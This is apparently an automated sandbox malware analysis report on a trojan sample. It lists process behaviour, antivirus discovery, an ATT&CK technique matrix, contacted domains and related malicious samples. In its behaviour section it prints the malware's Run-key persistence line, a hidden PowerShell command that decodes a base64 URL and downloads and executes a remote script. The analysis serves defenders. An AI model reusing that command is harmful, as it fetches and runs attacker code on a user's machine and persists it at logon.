Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\87J30ulb4q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 87J30ulb4q.exe, 00000000.00000002.1336329887.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 87J30ulb4q.exe, 00000000.00000002.1336329887.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: er\MsMpeng.exe
Source: C:\Users\user\Desktop\87J30ulb4q.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		21
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		21
Registry Run Keys / Startup Folder		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
87J30ulb4q.exe53%ReversingLabsByteCode-MSIL.Trojan.Nekark
87J30ulb4q.exe63%VirustotalBrowse
87J30ulb4q.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://zjhy.coimbratratadores.com/gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRg0%Avira URL Cloudsafe
http://zjhy.coimbratratadores.comd0%Avira URL Cloudsafe
https://zjhy.coimbratratadores.com0%Avira URL Cloudsafe
http://zjhy.coimbratratadores.com0%Avira URL Cloudsafe
https://zjhy.coimbratratadores.com/ukbhsxzcjwqypk0%Avira URL Cloudsafe
https://zjhy.coimbratratadores.com/gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfpRHdvRHfwkDM1AzM0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
zjhy.coimbratratadores.com
104.21.96.1
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://zjhy.coimbratratadores.com/gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfpRHdvRHfwkDM1AzMfalse
    • Avira URL Cloud: safe
    		unknown
    https://zjhy.coimbratratadores.com/ukbhsxzcjwqypkfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1312185487.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B7544A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9BEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C840F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://crl.micropowershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://crl.microsoftpowershell.exe, 0000000C.00000002.1476730296.00000238B6455000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://go.micropowershell.exe, 00000008.00000002.1308266474.0000000004D9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B753BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B8FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://zjhy.coimbratratadores.comd87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027D5000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore6lBeqpowershell.exe, 00000008.00000002.1308266474.0000000004A31000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1312185487.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C840F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://zjhy.coimbratratadores.com/gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRg87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000009.00000002.1399731267.000001B752A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B83A1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.microsoft.cpowershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://zjhy.coimbratratadores.com87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1308266474.0000000004B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B754110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9A5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B99CD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://zjhy.coimbratratadores.com87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B754116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9A62000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1308266474.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B752A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B83A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.21.96.1
                                  		zjhy.coimbratratadores.comUnited States
                                  		13335CLOUDFLARENETUSfalse

                                  General Information

                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1588179
                                  Start date and time:2025-01-10 22:20:49 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 4s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:19
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:87J30ulb4q.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:7c2c27aaedbc67a8e7e5c3e2e529d1a97c1b2778dbaeac037bfedaea51e0f867.exe
                                  Detection:MAL
                                  Classification:mal100.evad.winEXE@8/12@1/1
                                  EGA Information:
                                  • Successful, ratio: 33.3%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 24
                                  • Number of non-executed functions: 7
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 7224 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 7452 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  16:21:43API Interceptor47x Sleep call for process: powershell.exe modified
                                  16:21:47API Interceptor1x Sleep call for process: 87J30ulb4q.exe modified
                                  22:21:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jbgfag powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
                                  22:21:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jbgfag powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.21.96.1EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                  • www.mffnow.info/0pqe/
                                  zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                  • www.aonline.top/fqlg/
                                  QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                  • www.mzkd6gp5.top/3u0p/
                                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                  • pelisplus.so/administrator/index.php
                                  Recibos.exeGet hashmaliciousFormBookBrowse
                                  • www.mffnow.info/1a34/

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUSlsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 104.21.80.1
                                  V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  • 104.21.32.1
                                  https://services221.com/mm/Get hashmaliciousHTMLPhisherBrowse
                                  • 104.17.25.14
                                  https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                  • 104.17.25.14
                                  https://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                                  • 188.114.96.3
                                  https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                  • 104.17.25.14
                                  https://payhip.com/b/J12iX/purchasedGet hashmaliciousUnknownBrowse
                                  • 104.17.25.14
                                  upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 104.21.48.1
                                  jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  • 104.21.16.1

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0elsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 104.21.96.1
                                  V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  • 104.21.96.1
                                  jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.21.96.1
                                  2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  • 104.21.96.1
                                  6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  • 104.21.96.1
                                  SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                  • 104.21.96.1
                                  v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  • 104.21.96.1
                                  xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  • 104.21.96.1
                                  HGhGAjCVw5.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.21.96.1
                                  4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  • 104.21.96.1

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\87J30ulb4q.exe.log

                                  Download File
                                  Process:C:\Users\user\Desktop\87J30ulb4q.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1161
                                  Entropy (8bit):5.343102427125717
                                  Encrypted:false
                                  SSDEEP:24:ML9E4KlKDE4KhKiKhg84qpsXE4qdKtKIE4oKNzKoZAE4KzeR:MxHKlYHKh3ogvpH7tHo6hAHKzeR
                                  MD5:183BA07675E72658AF39483A11CE12AA
                                  SHA1:BDDF0D97547B884DF8CA74260B3ACAC0B91A4A3D
                                  SHA-256:6A8588FF2861266EC2B680ED010A2D1F34836008EA23FF7B10E7D72A02ADF297
                                  SHA-512:B3A742057FC63788BB504F13D9C9BE34A38ED29F85B095D9881B2F8F555FFBD1F49844E68EBC911245B3ADF0D40B15F9E93E356BB351CA532E71FE51542AEF1C
                                  Malicious:true
                                  Reputation:low
